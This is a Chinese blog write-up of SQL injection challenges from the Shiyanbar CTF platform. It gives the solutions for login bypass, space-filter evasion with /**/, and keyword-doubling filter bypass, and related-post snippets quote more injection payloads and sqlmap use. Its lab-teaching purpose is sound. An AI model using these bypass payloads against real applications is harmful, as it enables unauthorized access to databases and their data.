实验吧 web题--注入类

最新推荐文章于 2024-08-11 08:00:00 发布
最新推荐文章于 2024-08-11 08:00:00 发布
阅读量796 收藏
点赞数
文章标签: ctf 实验吧 sql注入 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yisosooo/article/details/77867848
版权

1、登陆一下好吗

SQL语句:select * from user where username='用户名' and password='密码'
尝试1'='1并没有得到flag,因为表中没有username=1。于是通过构造1'='0进行注入,并且得到flag。执行的语句为select * from user where username='1'='0' and password='1'='0'

2、简单的sql注入3

直接用sqlmap就ok

3、简单的sql注入2

经过注入尝试,程序将空格注释掉了,在sql语句中,可以用/**/代替空格

'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

4、简单的sql注入

输入'union select flag from flag where '1'='1,得到返回结果:'flag flag '1'='1''。可以判断将关键字进行了注释。

输入'unionunion selectselect flag fromfrom flag wherewhere '1'='1,得到返回结果:'unionselectflag fromflag where'1'='1''。可以判断将空格进行了注释
输入两遍空格和关键字:?id=1' unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1,得到flag

so_sooo
关注
实验web之简单的sql注入1
The Road Of Sec
05-06 8538
0x.部分解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
ctf 选择 库_实验CTF库-WEB(部分)
weixin_39613548的博客
12-19 1229
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
WEB注入目解析
qq_39607945的博客
08-01 419
后台登陆-实验吧 链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 考点:利用MD5注入sql语句,绕过对关键字(or)的过滤 查看源代码发现: 其实链接中的ffifdyop的MD5值就是我们可以满足绕过的hash值:276f722736c95d99e921722cf9ed621c。是十六进制表示的,decode之后是’or’6,or之后...
sqli-labs漏洞靶场~SQL注入(全网最全详解)
最新发布
weixin_67832625的博客
08-11 1354
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
[第一章 web入门]SQL注入-1
qq_43618536的博客
07-04 822
BUUCTF的[第一章 web入门]SQL注入-1
后台登录(实验CTF库-WEB
MyCyber
05-20 3980
后台登录(实验CTF库-WEB目概述 分值:10 难度:易参 解通过率:94% 格式:flag:{xxx} 目链接:http://www.shiyanbar.com/ctf/2036 参考解步骤 1、首先,我们先查看一下网页源码,发现其中有以下注释内容 $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE u...
实验吧——WEB-简单的登录、后台登录、加了料的报错注入、你真的会PHP吗?
迷风小白
03-29 2831
一. 简单的登录 这道确实一点都不简单 二、后台登录 这道打开就是一个登录框,输入一个1,提示密码错误,查看源代码。 <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r...
实验ctf-web:简单的sql注入
热门推荐
Elvira
08-25 1万+
简单的sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
实验吧-web-wp
Iambangbang的博客
08-21 614
登陆一下好吗? 这道目是一道技巧性的目,显然,问的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
WEB漏洞-SQL注入之简要注入1
weixin_43094844的博客
12-17 533
WEB漏洞-SQL注入之简要注入 思维导图
WEB-SQL注入
yufengly1984的专栏
07-29 217
1.
Web——面试整理
weixin_53560205的博客
10-20 2352
文章目录1.HTTP 1.0 和1.1区别2.web1.0和web2.0的区别3.LAMPNingx:4.httpd和nginx区别5.nginx的配置文件中包含的模块从全局——具体匹配的URL,分为几种6.nginx接受最大并发,受什么限制?最大文件打开数是多少?7.Linux系统对文件打开的数量有最大的限制,通常设置为1024,这个数值很容易会达到,从而造成系统程序或系统的瓶颈,如何去设置呢?8.Nginx 服务--虚拟主机9.NG优化10.Nginx有哪些模块11.配置文件组成rewrite12.比较
writeup-FLAG 实验
charlie_heng的专栏
11-30 1620
目如下 输入 FLAG,下面的页面会告诉你 FLAG 是否正确 解链接: http://ctf5.shiyanbar.com/qwctf/flag-checker.html 看了下打开的页面,发现一大串js代码。。。分析了一下发现a[0]给出了,然后可以一个个地推下去于是把js代码保存在一个文本下面,写了个py代码来解import recontent =open("C:/Users/Adm
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1608
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
CTF实验吧-WEB-2
qq_18661257的专栏
12-19 7571
1.简单的sql注入之2 解 我们先单引号试一下发现报错,所以基本存在注入,然后我们用空格会爆SQLi detected!因此被过滤了,发现+还是%a0这些编码都会报错,所以只能用万能空格替代/**/,然后测试是否含有flag表,接着测试是否含有flag列,然而并没有什么卵用,因为这货竟然过滤了左右括号,无法用exists判断flag表是否存在,同时由于左右括号不能用,为了让判断flag表存在
[SUCTF 2019]EasySQL _WP
Accompany的博客
01-09 1266
文章目录初次尝试堆叠注入payload 初次尝试 看到目,我们就知道是sql注入了 万能密码,回显nonono,无果 再输入0和非0数会发现一个没有回显,一个是只要非0便是相同的回显,这个相同的回显很重要,我们猜测他的后端语句,可能会有||这个东西 接着想试试注入,尽管1和1’会有不同的回显,但紧接着的各种注入方式回显都是nonono,这时就像上一篇的sql一样,可能他过滤了许多关键字,便想到了堆叠注入 其实在这也可直接跑字典,就可以少试探几步 返回数据 返回nonono
buuctf5(sql注入篇)
weixin_63231007的博客
05-10 4134
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值